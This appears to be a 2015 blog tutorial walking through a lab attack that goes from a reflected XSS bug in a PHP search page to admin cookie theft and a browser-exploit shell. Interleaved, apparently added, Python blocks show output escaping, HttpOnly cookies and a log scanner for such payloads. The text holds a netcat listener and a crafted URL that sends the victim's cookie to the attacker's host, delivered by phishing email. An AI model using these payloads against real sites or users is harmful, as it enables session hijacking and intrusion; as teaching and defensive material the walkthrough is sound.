From reflected XSS to shell

Written by  on July 8, 2015 

In this scenario we will begin with a simple, easily exploitable reflected XSS bug, then move on to a cookie-stealing scenario and finally to the total pwnage of the remote target.

We begin with this simple web app:

[Screenshot 1]

After the credentials are checked against the DB and the login succeeds, the web admin is directed to a page like this:

[Screenshot 2]

And if we try to search for something we see:

[Screenshot 3]

We see here a simple search web form; it seems that the admin can use it to search for content in the server DB. The beginning of the PHP code behind it might look like this:

<?php
// Search parameter taken straight from the query string
$name = $_GET['q'];
if (isset($name)) {
?>
<br>
<hr>
<!-- The value is echoed without any HTML encoding: this is the reflected XSS sink -->
You are searching: <?php echo $name; ?>
<br>
<?php } ?>

As we see, the content of the text box is printed directly into the page; this looks like the typical reflected XSS bug. We can check that by entering the following in the text box:

<script>alert("XSS DETECTED");</script>

[Screenshot 4]

Good, now we have detected the XSS vuln, but how do we exploit it? The answer is simple: since the remote web app uses cookies, we can steal the admin's cookie and use it to access the admin account from our attacker box.
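Two defensive changes close this hole, and the following Python sketch (added here; it is not code from the original post or from the demo application) shows both side by side: the reflected parameter is HTML-escaped before it reaches the page, and the session cookie is issued with HttpOnly so that document.cookie cannot read it. The alert string is the one from the post; the cookie name PHPSESSID is an assumption (PHP's default, the post does not show the app's real cookie).

```python
import html

# Constructed sample inputs: the alert payload quoted in the post and a benign search term.
ALERT_PAYLOAD = '<script>alert("XSS DETECTED");</script>'
BENIGN_QUERY = "quarterly report"


def render_vulnerable(q: str) -> str:
    """Mirrors the post's PHP: the q parameter is dropped into the HTML verbatim."""
    return f"You are searching: {q}"


def render_fixed(q: str) -> str:
    """Same template with the parameter HTML-escaped first. quote=True also
    encodes ' and " so the value is inert inside attribute values, not just text."""
    return f"You are searching: {html.escape(q, quote=True)}"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie line for the admin session. HttpOnly keeps document.cookie from
    reading it, which is exactly what the post's payload relies on; Secure and
    SameSite are defence in depth. The cookie name is assumed (PHP's default)."""
    return f"Set-Cookie: PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def script_readable(set_cookie: str) -> bool:
    """True when a Set-Cookie header lacks HttpOnly, i.e. page script can read the cookie.
    Handy for auditing an application's responses."""
    attrs = [a.strip().lower() for a in set_cookie.split(";")[1:]]
    return "httponly" not in attrs


if __name__ == "__main__":
    print(render_vulnerable(ALERT_PAYLOAD))   # raw <script> reaches the browser
    print(render_fixed(ALERT_PAYLOAD))        # browser displays the text, runs nothing
    print(session_cookie_header("constructed-session-id"))
    print(script_readable("Set-Cookie: PHPSESSID=constructed; Path=/"))  # True: no HttpOnly
```

In PHP the equivalent of html.escape(q, quote=True) is htmlspecialchars($name, ENT_QUOTES, 'UTF-8') at the echo, and the HttpOnly flag on the session cookie comes from session.cookie_httponly (php.ini) or session_set_cookie_params(). Output encoding is the actual fix; HttpOnly only limits what a successful injection can steal.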

First of all we can start our netcat listener on port 80:

nc -lvp 80

[Screenshot 5]

Now we can generate an evil email which includes a link to the following URL:

http://192.168.11.9/app/backend.php?q=%3Chtml%3E%3Cbody%20onload=%27%20location.replace%28%22http://192.168.11.3/%22.concat%28document.cookie%29%29;%27%3E%3C/html%3E

This will send the cookie to the netcat listener on our box. The next step is to use social engineering: send the mail to our victim and steal their cookie:
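On the detection side, this attack leaves a clear trace in the web server's access log: the victim's browser requests backend.php with a q value that, once percent-decoded, is markup rather than a search term. The following Python scanner is an added example (not part of the original post) that decodes each query value and flags HTML tags, inline event handlers such as onload=, and references to document.cookie. The log lines are constructed for the example; the first carries the URL from the post, requested from an assumed victim address 192.168.11.50, with the listener address from the post inside the query.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Constructed sample access-log lines (Apache common log format). The first
# carries the percent-encoded URL from the post, requested by an assumed victim
# address 192.168.11.50; 192.168.11.3 inside the query is the listener from the post.
SAMPLE_LOG = """\
192.168.11.50 - - [08/Jul/2015:10:15:02 +0000] "GET /app/backend.php?q=%3Chtml%3E%3Cbody%20onload=%27%20location.replace%28%22http://192.168.11.3/%22.concat%28document.cookie%29%29;%27%3E%3C/html%3E HTTP/1.1" 200 512
192.168.11.20 - - [08/Jul/2015:10:16:40 +0000] "GET /app/backend.php?q=quarterly+report HTTP/1.1" 200 1024
192.168.11.21 - - [08/Jul/2015:10:17:05 +0000] "GET /app/backend.php?q=%3Cscript%3Ealert%28%22XSS%20DETECTED%22%29;%3C/script%3E HTTP/1.1" 200 480
192.168.11.22 - - [08/Jul/2015:10:18:11 +0000] "GET /app/index.php HTTP/1.1" 200 2048
"""

# Groups: client, timestamp, method, path, status
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Coarse indicators that a query value is markup or script rather than a search
# term, checked in this order; the first match names the reason.
XSS_MARKERS = (
    ("html_tag", re.compile(r"</?[a-z][a-z0-9]*[\s>/]", re.I)),  # <html>, </script>, <body ...
    ("event_handler", re.compile(r"\bon[a-z]+\s*=", re.I)),     # onload=, onerror=, ...
    ("cookie_access", re.compile(r"document\.cookie", re.I)),   # script reading the session cookie
    ("js_url", re.compile(r"javascript:", re.I)),
)


def decode_params(path: str) -> dict:
    """Split the query string and percent-decode each value twice, so that a
    double-encoded payload is inspected in its final, browser-visible form."""
    params = {}
    for pair in urlsplit(path).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote_plus(name)] = unquote_plus(unquote_plus(value))
    return params


def flag_request(line: str):
    """Return (client_ip, parameter, reason) for a suspicious request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _ts, _method, path, _status = m.groups()
    for name, value in decode_params(path).items():
        for reason, marker in XSS_MARKERS:
            if marker.search(value):
                return (client, name, reason)
    return None


def scan_log(text: str) -> list:
    """Run flag_request over every line and keep the hits."""
    return [hit for hit in map(flag_request, text.splitlines()) if hit]


if __name__ == "__main__":
    for client, param, reason in scan_log(SAMPLE_LOG):
        print(f"{client} sent {reason} in parameter '{param}'")
```

The client address in a hit is the victim, not the attacker, because it is the admin's browser that follows the link; the exfiltration destination is only visible inside the decoded value. A scanner like this is reactive and will produce some false positives on legitimate input containing angle brackets, so it complements output encoding on the page rather than replacing it.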

[Screenshot 6]

We can also use a command line tool in Kali to send the evil mail:

[Screenshot 7]

And when our victim opens our mail and follows the link:

[Screenshot 8]

We got our victim’s cookie!!

Now we can use an HTTP proxy like Paros to inject that cookie and browse the site as admin:

[Screenshot 9]

Now we can browse the site as admin:

[Screenshot 10]

But what now? We only have the admin account, and it looks like we can't do anything funny here.

We can escalate this attack by serving a client-side exploit; we can use browser autopwn, for example:

[Screenshot 11]

We start the server and craft our evil URL, using the same trick as before to redirect our victim to it:

[Screenshot 12]

And when the victim gets caught:

[Screenshot 13]

By setting up this scenario, I dare you to think about all the possibilities of this attack.

Game over P-)
